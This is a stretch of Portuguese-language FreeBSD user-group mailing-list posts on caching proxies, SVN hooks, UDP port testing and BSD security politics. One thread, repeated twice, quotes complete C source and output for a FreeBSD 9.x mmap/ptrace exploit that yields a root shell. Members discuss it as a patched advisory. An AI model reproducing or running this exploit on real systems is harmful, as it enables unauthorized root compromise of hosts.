com outro comando, qual é e qual é o pino na saida do gpioctl -l que é
fisicamente o P9_5? posso somar 32 ao 5 e seria o pino 37 no free?

http://insigntech.files.wordpress.com/2013/09/bbb_pinouts.jpg

obrigado
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] site da fug com freebsdnews em pt/br como?

[Evandro Nunes]

oi

como é que o site da fug está com as noticias do freebsdnews em pt/br?
sei que ao clicar chama o site no google translate mas e pra gerar, deu pra
ver que é rss mas o freebsdnews nao tem rss em portugues e se voce
simplesmente cola o rss no google translate ele traduz o rss e quebra tudo

eu queria usar esse feed em portugues tambem no meu celular
quem sabe me dizer?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] RES: Thundercache para conteúdos dinâmicos [OFF - TOPIC]

[Evandro Nunes]

2014/1/9 Márcio Elias 

> Evandro, se essa pergunta "voce teve esse aumento de cpu com wccp com
> quantos Mbit/s passando?" from pra mim, queria dizer que o aumento de CPU
> que me refiro foi do Router e não do cache, pois o router tem que
> direcionar o tráfego pro cache.
>

era sim, sim estou falando do router mesmo pra entender qual impacto do
wccp e se é maior ou menor que um mikrotik com mangle ou ipfw fwd


>
> Hoje temos um Hyper 300, link dedicado de 300M e a minha máquina onde o
>

desses 300 quantos mbit/s é de porta 80 (ou seja passa pelo wccp)?


> Hyper está instalado é essa:
>
> Dual Xeon 3.2
>
> 48GB Ram
>
> 25 discos sata 7200rpm de 500G cada.
>
> Segundo o suporte da Thagos, nossa máquina nesta configuração suportaria
> até o T-500 (versão do Hyper para até 500MB de tráfego).
>
> Não conheco o PeerApp, mais pelo que vejo o pessoal comentando e
> principalmente sobre os orçamentos dele, acho que eh algo muito além de
> qualquer outra solução citada aqui.
>
> O mais importante não é ter a melhor e mais cara solução, e sim aquela que
> melhor se enquadra nas necessidades de cada cenário e te da possibilidade
> de evolução, com estabilidade e um bom custo benefício. Por isso acho que
> há mercado para todos.
>
> --
> Att.
> __
> Márcio Elias Hahn do Nascimento
>
> Araranguá - SC
> Cel:   (55) 48-9661-0233
> msn: marcioeliash...@hotmail.com
>
>
> 2014/1/9 Evandro Nunes 
>
> > hoje o thunder ja suporta wccp
> > no passado era possivel fazer wccp pro lusca e o lusca redir pro thunder
> > mas o thunder sozinho da mais conta que o lusca
> >
> > o thunder evoluiu muito e com um hardware confiavel nao deve nada a
> solucao
> > da taghos mas ainda deve pro peer app que cacheia outros conteudos alem
> de
> > web, mas o custo beneficio do thunder é melhor
> >
> > voce teve esse aumento de cpu com wccp com quantos Mbit/s passando?
> >
> >
> > 2014/1/4 Ciro Cardoso de Meneses 
> >
> > > Meu melhor site com o thundercache é este:
> > >
> > > 924 clientes
> > >
> > > Gateway:
> > >xeon dell quadcore (antigo)
> > >   8G Mem
> > >   6Hds (1 sistema, 3 lusca, 2 thunder)
> > >   Freebsd 9.2
> > >   unbound
> > >   lusca
> > >   thundercache
> > >
> > >
> > > Controlador de Banda: core i7 (xinglig) com placa intel dual giga +
> > >Freebsd 8.4
> > >unbound
> > >dummynet
> > >
> > > /0   /1   /2   /3   /4   /5   /6   /7   /8   /9
> /10
> > >  Load Average   |||
> > >
> > >   Interface   Traffic   Peak
>  Total
> > >   tun16  in  0.000 Mb/s  0.001 Mb/s
> 24.848
> > KB
> > >  out 0.000 Mb/s  0.000 Mb/s
> 51.946
> > MB
> > >
> > >tun0  in  0.000 Mb/s  0.000 Mb/s
> 72.280
> > MB
> > >  out 0.000 Mb/s  0.000 Mb/s
> 84.155
> > MB
> > >
> > > lo0  in 31.293 Mb/s 42.755 Mb/s
>  3.588
> > TB
> > >  out31.293 Mb/s 42.755 Mb/s
>  3.588
> > TB
> > >
> > >bge0  in 86.964 Mb/s 93.284 Mb/s
>  6.892
> > TB
> > >  out 8.955 Mb/s  9.078 Mb/s
>  1.018
> > TB
> > >
> > >igb0  in  9.008 Mb/s 10.272 Mb/s
>  1.083
> > TB
> > >  out   191.210 Mb/s205.633 Mb/s
> 16.764
> > TB
> > >
> > >
> > > last pid: 16702;  load averages:  1.14,  1.20,
> > > 1.10
> > > up 16+19:19:32  13:28:47
> > > 61 processes:  2 running, 58 sleeping, 1 waiting
> > > CPU 0:  2.2% user,  0.0% nice, 12.7% system,  6.0% interrupt, 79.0%
> idle
> > > CPU 1:  1.5% user,  0.0% nice, 24.0% system,  8.2% interrupt, 66.3%
> idle
> > > CPU 2:  4.9% user,  0.0% nice, 12.7% system,  5.2% interrupt, 77.2%
> idle
> > > CPU 3:  3.7% user,  0.0% nice, 13.9% system,  7.5% interrupt, 74.9%
> idle
> > > Mem: 4230M Active, 1400M Inact, 1443M Wired, 95M Cache, 827M Buf, 743M
> > Free
> > > ARC: 243M Total, 1008K MFU, 114M MRU, 23M Anon, 4177K Header, 101M
> Other
> > > Swap: 4096M Total, 9616K Used, 4086M Free
> > >
> > >   PID USERNAMETHR PRI NICE   SIZERES STATE   C   TIMECPU
> > > COMMAND
> > >11 root  4 171 ki3

Re: [FUG-BR] [OFF-TOPIC]Palestra sobre segurança by Theo de Raadt

[Evandro Nunes]

2013/12/30 Marco Carvalho de Oliveira 

> Olá,
>
> Sei que está e uma lista de FreeBSD, no entanto como o tema de segurança
> envolve as áreas a fim deste tema, logo acredito que esta palestra do The
> Raadt, dando umas cutucadas em algumas funcionalidades ainda não
> habilitadas no FreeBSD para mitigar falhas de segurança seja
> interessante... é uma palestra recente que aconteceu na ruBSD 14 /2013, o
> tema é antigo ao mesmo tempo atual :o visto que estas funcionalidades a
> séculos já eram comentadas e tratadas por ele no OpenBSD ...
>
> Eu fico imaginando X) a moral deste cara palestrando para um exercito de
> usuários de desenvolvedores de FreeBSD... !!! e ainda na Rússia!!!
>
> Segue o Link
> http://www.openbsd.org/papers/ru13-deraadt/mgp1.html
>

theo é um cara bom mas profissionalmente frustrado sabe-se-la-pq, e que
anualmente imprime a foto de alguem/algumaempresa e coloca no seu quadro de
tiros pessoal, antes do freebsd foi a intel, antes da intel foi a cisco
antes da cisco foi o linux, uma pena ele atacar outros sistemas bsd agora
ao invés de contribuir de forma mais relevante
theo de raadt é 12 milhões de dólares mais pobre porque o departamento de
defesa escolheu o FreeBSD ao invés do OpenBSD pra segurança
com 1 milhão investido em ambos o openbsd fez o W^X que o theo defende
nessa palestra 10 anos depois enquanto o freebsd começou a la o tal de
granularization que permitiu a criação do mac e hoje do capsicum mas que na
epoca ninguem viu resultado porque era estrutural

bom 10 anos depois e 12 milhões de dolares depois acreditem esse ataque do
theo não é coincidencia
em 2014 termina os 10 anos desse contrato e com o capsicum o freebsd
termina o objetivo final do contrato e implementa tudo que o theo disse que
seria impossivel, o que o theo não disse é que o mac_mls, mac_partition e o
capsicum são 3 formas de isolamento que mitiga o risco que ele está
apontando o dedo, mas o que o theo disse pra tambem se previnir com essa
alegacao e que ele quer tudo habilitado por padrao e no freebsd apesar de
ter mac no kernel generic nao tem politicas mac aplicadas por padrao (nem
acho que deve ter quem ja trabalhou com mac sabe o motivo)

o robert watson na usenix sei la que ano mostrou uma forma generica de
escapar disso tudo inclusive do W^X e do systrace do openbsd então o que
ele está defendendo ja teve sua eficiencia derrubada no ultimo slide ele
mostra isso deixando claro que dificulta mas nao evita
la na russia ele falou o que bem quis, vamos ver se ele escolhe o mesmo
tema pra bsdcan2014 ou alguma conferencia na california ou NY na russia nao
tinha ninguem do freebsd capaz de argumentar com o theo sobre seguranca (
http://tech.yandex.com/events/ruBSD/2013/) o gleb era o unico presente mais
ligado ao src/sys mas o foco dele é networking



> --
> Marco Carvalho de Oliveira
> Gerente de Projetos de TI - Políclinica São Lucas
> LPI 3 - Linux professional Certificate
> Certified Linux Administrator da Novell
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] RES: Thundercache para conteúdos dinâmicos [OFF - TOPIC]

[Evandro Nunes]

hoje o thunder ja suporta wccp
no passado era possivel fazer wccp pro lusca e o lusca redir pro thunder
mas o thunder sozinho da mais conta que o lusca

o thunder evoluiu muito e com um hardware confiavel nao deve nada a solucao
da taghos mas ainda deve pro peer app que cacheia outros conteudos alem de
web, mas o custo beneficio do thunder é melhor

voce teve esse aumento de cpu com wccp com quantos Mbit/s passando?


2014/1/4 Ciro Cardoso de Meneses 

> Meu melhor site com o thundercache é este:
>
> 924 clientes
>
> Gateway:
>xeon dell quadcore (antigo)
>   8G Mem
>   6Hds (1 sistema, 3 lusca, 2 thunder)
>   Freebsd 9.2
>   unbound
>   lusca
>   thundercache
>
>
> Controlador de Banda: core i7 (xinglig) com placa intel dual giga +
>Freebsd 8.4
>unbound
>dummynet
>
> /0   /1   /2   /3   /4   /5   /6   /7   /8   /9   /10
>  Load Average   |||
>
>   Interface   Traffic   PeakTotal
>   tun16  in  0.000 Mb/s  0.001 Mb/s   24.848 KB
>  out 0.000 Mb/s  0.000 Mb/s   51.946 MB
>
>tun0  in  0.000 Mb/s  0.000 Mb/s   72.280 MB
>  out 0.000 Mb/s  0.000 Mb/s   84.155 MB
>
> lo0  in 31.293 Mb/s 42.755 Mb/s3.588 TB
>  out31.293 Mb/s 42.755 Mb/s3.588 TB
>
>bge0  in 86.964 Mb/s 93.284 Mb/s6.892 TB
>  out 8.955 Mb/s  9.078 Mb/s1.018 TB
>
>igb0  in  9.008 Mb/s 10.272 Mb/s1.083 TB
>  out   191.210 Mb/s205.633 Mb/s   16.764 TB
>
>
> last pid: 16702;  load averages:  1.14,  1.20,
> 1.10
> up 16+19:19:32  13:28:47
> 61 processes:  2 running, 58 sleeping, 1 waiting
> CPU 0:  2.2% user,  0.0% nice, 12.7% system,  6.0% interrupt, 79.0% idle
> CPU 1:  1.5% user,  0.0% nice, 24.0% system,  8.2% interrupt, 66.3% idle
> CPU 2:  4.9% user,  0.0% nice, 12.7% system,  5.2% interrupt, 77.2% idle
> CPU 3:  3.7% user,  0.0% nice, 13.9% system,  7.5% interrupt, 74.9% idle
> Mem: 4230M Active, 1400M Inact, 1443M Wired, 95M Cache, 827M Buf, 743M Free
> ARC: 243M Total, 1008K MFU, 114M MRU, 23M Anon, 4177K Header, 101M Other
> Swap: 4096M Total, 9616K Used, 4086M Free
>
>   PID USERNAMETHR PRI NICE   SIZERES STATE   C   TIMECPU
> COMMAND
>11 root  4 171 ki31 0K64K RUN 0 1403.9 322.51% idle
>12 root 27 -60- 0K   432K WAIT0  57.7H 22.90% intr
> 0 root885  -80 0K 14160K -   0  49.6H 18.95% kernel
> 49295 squid37  440  4520M  4414M ucond   0 256:40 18.36% squid
> 49258 root216  470   727M   647M ucond   2 180:14  0.98%
> thunder71_f64_r972
>
>
>
> Em 4 de janeiro de 2014 11:16, Márcio Elias  >escreveu:
>
> > Já usei o SpeedBR (uma MERDA SEM TAMANHO), o Thunder íamos usar
> > inicialmente mais este não tinha implementação para WCCP e queríamos
> > redirecionar o tráfego do nosso border router pra ele, ai chegamos ao
> > Thagos que usamos hoje. O nome da solução deles é Hyper Cache.
> >
> > Para terem uma ideia já que mencionaram a mudança no youtube, a alguns
> dias
> > (quando isso ocorreu) notei que meu percentual de economia diminuiu
> muito,
> > e voltou a crescer, ai entrei em contato com o suporte deles (24x7) e me
> > disseram que tinham tirado o youtube (o que causou a diminuição da
> > economia), fizeram a implementação de acordo com o novo protocolo deles,
> > limparam o conteúdo em cache antigo (somente referente ao youtube) e
> > colocaram o mesmo para funcionar novamente, sem eu nem ficar sabendo.
> >
> > Ou seja, vc paga a licença pra eles, tem suporte 24x7, e desenvolvimento
> > constante, vc nem sabe que precisa se preocupar com isso, eles se
> preocupam
> > por vc.
> >
> > Quanto a filtros de conteúdo, pelo que ví não tem no Hyper da Thagos,
> mais
> > acho que isso hoje em dia, não sei seu cenário, mais é um tanto
> complicado,
> > até mesmo o google nas buscas usa protocolo HTTPS, sendo assim o proxy
> tem
> > que interceptar as conexões na porta 443, fazer uma nova requisição como
> se
> > fosse o cliente, (para ter acesso aos dados da conexão) e então devolver
> o
> > resultado ao cliente original usando um certificado SSL do próprio proxy,
> > que não é o certificado original do endereço visitado, o que para o
> Chrome
> > por exemplo é o bastante para impedir a navegação, outros browsers como
> > Firefox ou IE até permitem, mais o cliente fica louco de tanto ter que
> > aceitar certificados não assinados.
> >
> > Quanto a filtragem, acredito que tería que ser feita por um firewall, (do
> > meu ponto de vista).
> >
> > Um ultimo concelho, o tráfego de dados entre todos seus usuários e a
> > internet pode ser demasiadamente grande para colocar uma máquina em
> bridge
> > no meio e esperar que fun

Re: [FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

[Evandro Nunes]

sysadmins com noção de 2 décadas atrás? quem dera!

os que trabalham por aqui (orgão público, vocês que pagam o salário deles
sim, protestem! rsss) não tem noção de MS-DOS como usuários finais tinham
há 20 anos atrás, eu pedi para modificarem um logonscript com 3 linhas que
há 20 anos eram triviais em qualquer autoexec.bat da vida e não conseguiram
então patrick, é otimismo seu acreditar que temos sysadmins com noção de 20
anos atrás seja de segurança ou de... sysadministration basics ;-)

hoje linuxer usa ubuntu, na minha época era slack
hoje se conhece mais de pfsense e pcbsd do que freebsd e openbsd
a geração atual não tem interesse (e cada vez menos necessidade) de
aprender nada além do mínimo, ou um pouco menos rsss. na minha época se
repetia de ano na escola, hoje tem progressão continuada rsss


2013/6/20 Marcelo Gondim 

> Em 20/06/13 15:42, Evandro Nunes escreveu:
> > On Thu, Jun 20, 2013 at 9:29 AM, Marcelo Gondim  >wrote:
> >
> >> É pessoal,
> >>
> >> Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
> >> detectar isso?  :(
> >> E funciona lindo mesmo o programa.
> >>
> > de onde saiu isso que tem 20 anos? pelo pouco que deu pra ler explora uma
> > falha do freebsd 9 inclusive o security adv so explora o freebsd 9
> > alguem teve sucesso com freebsd 8, 7, outro?
> > acho que a frase "seguranca de 20 anos atras" foi apenas ironiazinha
> > pelo que vi esse vulnerabilidade nao afeta quem tem debug de processo nao
> > root nem quem tem mac_partition ou bsdextended implementado
> >
> > nego quer é aparecer rss rsss a falha tai, mas não teve 0day inclusive o
> > "ultra mega hacker expert" só fez o exploit depois que o advisory foi
> > publicado, e ainda levou 2 dias pra conseguir explorar o que ja estava
> > documentado e corrigido e vem tirar uma onda de full disclosure...
> Pois é recebi isso em uma lista de segurança que assino. Consegui um 8.4
> e testei e não rola. Só no 9 mesmo.
> Esses caras são uns paiaços mesmo rsrsrsrsrs
>
> >
> >
> >>
> >>  Mensagem original 
> >> Assunto:Happy Birthday FreeBSD! Now you are 20 years old and
> your
> >> security is the same as 20 years ago... :)
> >> Data:   Wed, 19 Jun 2013 23:32:59 +0200
> >> De: Hunger 
> >> Para:   full-disclos...@lists.grok.org.uk
> >>
> >>
> >>
> >> $ uname -a
> >> FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
> >> 4 09:23:10 UTC 2012
> >> r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
> >> $ id
> >> uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
> >> $ gcc fbsd9lul.c -o fbsd9lul
> >> $ ./fbsd9lul
> >> FreeBSD 9.{0,1} mmap/ptrace exploit
> >> by Hunger 
> >> # id
> >> uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
> >> #
> >>
> >>
> >>  code =
> >>
> >> /*
> >>* FreeBSD 9.{0,1} mmap/ptrace exploit
> >>* by Hunger
> >>*
> >>* Happy Birthday FreeBSD!
> >>* Now you are 20 years old and your security is the same as 20 years
> >> ago...
> >>*
> >>* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op,
> pipacs,
> >> prof,
> >>*  sd, sghctoma, snq, spender, s2crew and others at
> >> #hekkcamp:
> >>*  I hope we'll meet again at 8@1470n
> >>*
> >>* Special thanks to proactivesec.com
> >>*
> >>*/
> >>
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >> #include 
> >>
> >> #define SH "/bin/sh"
> >> #define TG "/usr/sbin/timedc"
> >>
> >> int
> >> main(int ac, char **av) {
> >>  int from_fd, to_fd, status;
> >>  struct stat st;
> >>  struct ptrace_io_desc piod;
> >>  char *s, *d;
> >>  pid_t pid;
> >>
> >>  if (geteuid() == 0)  {
> >>   setuid(0);
> >>   execl(SH, SH, NULL);
> >>   return 0;
> >>  }
> >>
> >>  printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
> >>  printf("by Hunger\n");
> >>
> >

Re: [FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

[Evandro Nunes]

On Thu, Jun 20, 2013 at 9:29 AM, Marcelo Gondim wrote:

> É pessoal,
>
> Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
> detectar isso?  :(
> E funciona lindo mesmo o programa.
>

de onde saiu isso que tem 20 anos? pelo pouco que deu pra ler explora uma
falha do freebsd 9 inclusive o security adv so explora o freebsd 9
alguem teve sucesso com freebsd 8, 7, outro?
acho que a frase "seguranca de 20 anos atras" foi apenas ironiazinha
pelo que vi esse vulnerabilidade nao afeta quem tem debug de processo nao
root nem quem tem mac_partition ou bsdextended implementado

nego quer é aparecer rss rsss a falha tai, mas não teve 0day inclusive o
"ultra mega hacker expert" só fez o exploit depois que o advisory foi
publicado, e ainda levou 2 dias pra conseguir explorar o que ja estava
documentado e corrigido e vem tirar uma onda de full disclosure...


>
>
>  Mensagem original 
> Assunto:Happy Birthday FreeBSD! Now you are 20 years old and your
> security is the same as 20 years ago... :)
> Data:   Wed, 19 Jun 2013 23:32:59 +0200
> De: Hunger 
> Para:   full-disclos...@lists.grok.org.uk
>
>
>
> $ uname -a
> FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
> 4 09:23:10 UTC 2012
> r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
> $ id
> uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
> $ gcc fbsd9lul.c -o fbsd9lul
> $ ./fbsd9lul
> FreeBSD 9.{0,1} mmap/ptrace exploit
> by Hunger 
> # id
> uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
> #
>
>
>  code =
>
> /*
>   * FreeBSD 9.{0,1} mmap/ptrace exploit
>   * by Hunger
>   *
>   * Happy Birthday FreeBSD!
>   * Now you are 20 years old and your security is the same as 20 years
> ago...
>   *
>   * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs,
> prof,
>   *  sd, sghctoma, snq, spender, s2crew and others at
> #hekkcamp:
>   *  I hope we'll meet again at 8@1470n
>   *
>   * Special thanks to proactivesec.com
>   *
>   */
>
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
> #include 
>
> #define SH "/bin/sh"
> #define TG "/usr/sbin/timedc"
>
> int
> main(int ac, char **av) {
> int from_fd, to_fd, status;
> struct stat st;
> struct ptrace_io_desc piod;
> char *s, *d;
> pid_t pid;
>
> if (geteuid() == 0)  {
>  setuid(0);
>  execl(SH, SH, NULL);
>  return 0;
> }
>
> printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
> printf("by Hunger\n");
>
> if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
>  (to_fd = open(TG, O_RDONLY)) == -1)
>  err(1, "open");
>
> if (stat(av[0], &st) == -1)
>  err(2, "stat");
>
> if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
>  MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
>  (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
>  MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) ==
> MAP_FAILED)
>  err(3, "mmap");
>
> if ((pid = fork()) == -1)
>  err(4, "fork");
>
> if (!pid) {
>  if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
>  err(5, "ptraceme");
>
>  return 0;
>  }
>
> if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
>  err(6, "ptattach");
>
> if (wait(&status) == -1)
>  err(7, "wait");
>
> piod.piod_op = PIOD_WRITE_D;
> piod.piod_offs = d;
> piod.piod_addr = s;
> piod.piod_len  = st.st_size;
>
> if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
>  err(8, "ptio");
>
> execl(TG, TG, NULL);
>
> return 0;
> }
>
>
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] homenagem ao Steve Jobs

[Evandro Nunes]

ai

rodando a toa entrei no site da freebsd brasil e vi essa homenagem ao el joboso:

http://www.freebsdbrasil.com.br/home.php?area=20&conteudo=53

achei legal o apanhado e a foto

tem até umas gatinhas quem diria rsss

alguém sabe dizer quem são as pessoas da foto?
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] subversion solucao para atributos especiais

[Evandro Nunes]

era bem isso que eu queria
voces prestam consultoria em svn?
esta em freebsd inclusive usei o seu pdf de referencia
e voce acertou é sim itil

outra coisa tem como dividir a arvore do repo em labels e
garantir que um label so so pode ser alterado com a autorizacao
de alguem responsavel por aquele trecho da arvore?

2009/2/11 Patrick Tracanelli :
> Hmm, ja vi tudo. ITIL sendo implantado e o Repositório vai ter que
> acumular funções, certo?
>
> É completamente possível. Subversion tem um recurso chamado
> propriedades, a ideiaa é usar e abusar disso. É como se fossem atributos
> customizados na árvore SVN.
>
> Pensemos numa estratégia simples
>
> Pense nas propriedades:
>
> itil:limitcommit = 5000
>
> itil:commiters = patrick, joao, maria
>
> itil:versaoatual = $REV$
>
> E propeidades adicionais:
>
> itil:crisiscode
> itil:incidentid
>
> Com isso em mente, voce vai programar hooks, que podem ser de
> pre-commit, e nesses hooks voce vai programar
>
> - Se quem está fazendo commit estiver listado em itil:commiters, verifica:
>
> - Se o conteudo de itil:versaoatual for menor que itil:limitcommit todos
> podem fazer commit a vontade. Senão, o usuário listado em itil:commiters
> não pode fazer commit, e voce da um exit com o código que desejar dentro
> do esperado pelo SVN.
>
> - Para todo e qualquer usuário, verifique se itil:crisiscode existe e
> também se itil:incidentid existe. Se não existir não permite o commit.
> Se existir você racionaliza, ve se o conteudo de itil:crisicode faz
> sentido (exemplo, apenas números), e se itil:incidentid faz sentido -
> comparando com o formato de identificadores de incidente que a sua
> gerencia de incidentes utiliza.
>
> Pra melhor, automatize. Sua gestão de incidentes deve ter o mesmo
> crisiscode e incientid em algum banco de dados onde eles controam isso.
> Pesquise nesse banco! Afinal não pode haver um commit motivado por
> incidente se o incidente não estiver registrado certo?
>
> O SVN utiliza hooks no diretório hooks/ de cada repositório. Nele voce
> pode criar rotinas na sua linguagem favorita (shell, perl, php, python,
> awk, sed, forth, fortran hehe), e o SVN executará o hook em questão.
>
> Nos podemos fazer isso.
>
> E possivelmente tudo o mais que seja possivel fazer no SVN. Creio que
> poucos sistema de versionamento sao flexiveis como o SVN.
>
> Que eu conheça só Perforce é mais.
>
> Evandro Nunes escreveu:
>> lista
>>
>> tenho uma demanda para criar restricao de acesso a alguns arquivos no
>> repositorio
>> quando eles passarem de uma certa versao que combine com a versao
>> limite configurada
>>
>> por exemplo tenho um arquivo em trunk/4.0/sw/vi.jsp
>>
>> nesse arquivo quero gravar uma informacao, uma marcacao de versao, por
>> exemplo versao X
>>
>> quero permitir que um certo (ou certos) usuario possa fazer commit
>> nesse arquivo ate a versao X
>>
>> se o repositorio passar da versao X quero que aquele usuario nao possa
>> mais fazer commit apenas checkput update e outras coisas de leitura
>>
>> quero ainda que o nome do usuario que fez a ultima alteracao sempre
>> seja preenchido com argumento
>> que e o codigo interno de chamado de problema, chamado de crisis-code
>> e tambem do numero do chamado como aberto
>> pelo povo da gestao de incidentes
>>
>> quero que nao possa acontecer commit nesses arquivos sem esses dados 
>> preenchidos
>>
>> mas como essas informacoes sao especiais nao podem logicamente estar
>> nos logs de commit
>>
>> preciso saber se tem como fazer isso
>> se tiver como fazer preciso de uma visao sobre isso, uma visao da ideia
>> e por ultimo se for muito chato preciso saber quem pode fazer isso e
>> outras peripecias mais
>> -
>> Histórico: http://www.fug.com.br/historico/html/freebsd/
>> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
>
> --
> Patrick Tracanelli
>
> FreeBSD Brasil LTDA.
> Tel.: (31) 3516-0800
> 316...@sip.freebsdbrasil.com.br
> http://www.freebsdbrasil.com.br
> "Long live Hanin Elias, Kim Deal!"
>
> -
> Histórico: http://www.fug.com.br/historico/html/freebsd/
> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
>
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

[FUG-BR] subversion solucao para atributos especiais

[Evandro Nunes]

lista

tenho uma demanda para criar restricao de acesso a alguns arquivos no
repositorio
quando eles passarem de uma certa versao que combine com a versao
limite configurada

por exemplo tenho um arquivo em trunk/4.0/sw/vi.jsp

nesse arquivo quero gravar uma informacao, uma marcacao de versao, por
exemplo versao X

quero permitir que um certo (ou certos) usuario possa fazer commit
nesse arquivo ate a versao X

se o repositorio passar da versao X quero que aquele usuario nao possa
mais fazer commit apenas checkput update e outras coisas de leitura

quero ainda que o nome do usuario que fez a ultima alteracao sempre
seja preenchido com argumento
que e o codigo interno de chamado de problema, chamado de crisis-code
e tambem do numero do chamado como aberto
pelo povo da gestao de incidentes

quero que nao possa acontecer commit nesses arquivos sem esses dados preenchidos

mas como essas informacoes sao especiais nao podem logicamente estar
nos logs de commit

preciso saber se tem como fazer isso
se tiver como fazer preciso de uma visao sobre isso, uma visao da ideia
e por ultimo se for muito chato preciso saber quem pode fazer isso e
outras peripecias mais
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd

Re: [FUG-BR] OT - UDP checar porta

[Evandro Nunes]

valeu bro, era isso mesmo, blackhole ativo
pelo visto então vou ter que adaptar os teste pq a maquina sempre vai
te blackhole ligado

embaçado a bagaça hein, vou usar o check_dns e check_radius então

2008/3/22 Patrick Tracanelli <[EMAIL PROTECTED]>:
>
>
>  > Ola pessoal
>  >
>  > seguinte, ontem tive que fazer um script com algo q eu achava q seria
>  > trivial, e foi um fracasso
>  >
>  > quero testar se uma porta UDP num servidor remoto esta aberta
>  >
>  > testei com netcat, nc -dozu pois faco perfeitamente com -doz com proto
>  > tcp, e nada, a propria pagina de manual indica que nao funciona
>  >
>  > depois fiz um script perl usando net::ping e tambem eh impreciso pra UDP
>  >
>  > ai testei com o hping e ele flooda a porta sem deixar claro se ela ta
>  > ouvindo ou nao
>  >
>  > ai testei com nmap e vi que mesmo o nmap nao tem resultados coesos e
>  > confiaveis, dizendo open|filtered na maioria das portas, inclusive as
>  > sabidamente ouvindo...
>  >
>  > uma coisa  qachei seria simples, se mostrou um problemao
>  >
>  > aos hackers de plantao, como posso fazer isso de forma que o resultado
>  > seja confiavel?
>  >
>  > Testei o check_udp do nagios e tambem é um fracasso irmao hehehe
>  >
>  > por isso tem check_dns, check_radius, tudo separado... parece que nada
>  > checa UDP de forma generica confiavel...
>  >
>  > valeu
>
>  Cara, UDP é um protocolo tão simples e previsível que da até pra entender
>  exatamente como seu target de teste está configurado só pelo seu e-mail.
>
>  Entenda o seguinte, se você enviar um e-mail para uma porta UDP que não
>  estiver ouvindo, deve receber como resposta um icmp dst port unreacheable.
>  Se estiver ouvindo vai receber cedo ou tarde pelo menos um pacote udp, ou
>  não vai receber nada. É onde mora as caracteristicas do seu ambiente de
>  teste.
>
>  Se voce mandou um nmap numa porta que voce sabe que nao esta ouvindo e o
>  nmap responder open|filtered, as possibilidades são (1) um firewall no
>  caminho dropou o icmp unreach, ou (2) o servidor está com blackholes ativo
>  ou (3) a porta esta ativa.
>
>  Certamente o check_udp do nagios foi testado na mesma maquina e por isso
>  também não gerou resultado positivo. Veja por exemplo um scan num servidor
>  com blackholes:
>
>  # nmap -sU -P0 -T Aggressive 
>
>  Starting Nmap 3.95 ( http://www.insecure.org/nmap/ ) at 2008-03-22 14:29 BRT
>  All 1480 scanned ports on  are: open|filtered
>
>  Veja outro teste:
>
>  # nmap -sU -P0 -T Aggressive 10.69.69.1 -p 53,123,161,490,111,120
>
>  Starting Nmap 3.95 ( http://www.insecure.org/nmap/ ) at 2008-03-22 14:44 BRT
>  Interesting ports on main.bh.freebsdbrasil.com.br (10.69.69.1):
>  PORTSTATE SERVICE
>  53/udp  open|filtered domain
>  111/udp open|filtered rpcbind
>  120/udp closedcfdptkt
>  123/udp open|filtered ntp
>  161/udp open|filtered snmp
>  490/udp closedmicom-pfs
>
>  Todos os resultados acima, especialmente os CLOSED, sao validos, e a
>  maquina nao tem blackhole nem firewall.
>
>  Mais um:
>
>   nmap -n -sU -P0 -T Aggressive 10.69.69.132 -p 123,161,5060,6554
>
>  Starting Nmap 3.95 ( http://www.insecure.org/nmap/ ) at 2008-03-22 14:48 BRT
>  Interesting ports on 10.69.69.132:
>  PORT STATE SERVICE
>  123/udp  closedntp
